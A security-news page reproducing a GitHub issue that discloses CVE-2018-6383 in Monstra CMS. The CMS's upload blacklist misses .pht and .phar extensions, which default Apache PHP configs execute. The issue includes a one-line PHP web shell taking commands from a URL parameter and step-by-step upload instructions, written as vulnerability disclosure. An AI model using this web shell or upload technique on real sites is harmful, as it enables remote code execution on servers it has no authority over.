Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2018-6383: Some extension can bypassed extension filter in uploading process · Issue #429 · monstra-cms/monstra

Monstra CMS through 3.0.4 has an incomplete “forbidden types” list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048.

CVE
Open in Source
#vulnerability#ubuntu#debian#apache#js

Brief of this vulnerability
In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of “libapache2-mod-php” allow some extensions to execute php scripts.

Test Environment

  • Apache/2.4.10 (Debian)
  • PHP 5.6.33-0+deb8u1 (cli)

Affect version
<=3.0.4

Payload

  1. move to http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login

  2. Save php codes with ‘.pht’ extensions. and upload it like below.

# cmd.pht
<?php system($_GET['c']);?>

  1. Click the uploaded file name or
    move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]

  2. Profit!

Reason of This Vulnerability
Default setting of php5 module for apache2(libapache2-mod-php5) allow several extensions to execute as php script. This is some part of /etc/apache2/mods-enabled/php5.conf.

#/etc/apache2/mods-enabled/php5.conf
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    # Deny access to raw php sources by default
    # To re-enable it's recommended to enable access to the files
    # only in specific virtual host or directory
    Require all denied
</FilesMatch>

Because of this config, list of extension allowed to run php script is
php, php3, php4, php5, **pht**, phtml
and ‘phps’ extension shows source code of php file.

But Monstra prevent to upload php-style files using extension filer in uploading process at ./plugins/box/filesmanager/filesmanager.admin.php like below.

#./plugins/box/filesmanager/filesmanager.admin.php
        $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
                                 **'php', 'phtml', 'php3', 'php4', 'php5', 'phps',**
                                 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
                                 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');

Almost allowed extensions to execute as php can be filtered but ‘pht’ is not.

As a result, attacker can upload malicious php file using pht extensions.

Similar with this, default setting of ‘libapache2-mod-php7.1’ like this.

#OS:ubuntu 17.10
#/etc/apache2/mods-enabled/php7.1.conf 
<FilesMatch ".+\.ph(ar|p|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    # Deny access to raw php sources by default
    # To re-enable it's recommended to enable access to the files
    # only in specific virtual host or directory
    Require all denied
</FilesMatch>

So, phar extension can also be vulnerable in php7 environment.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE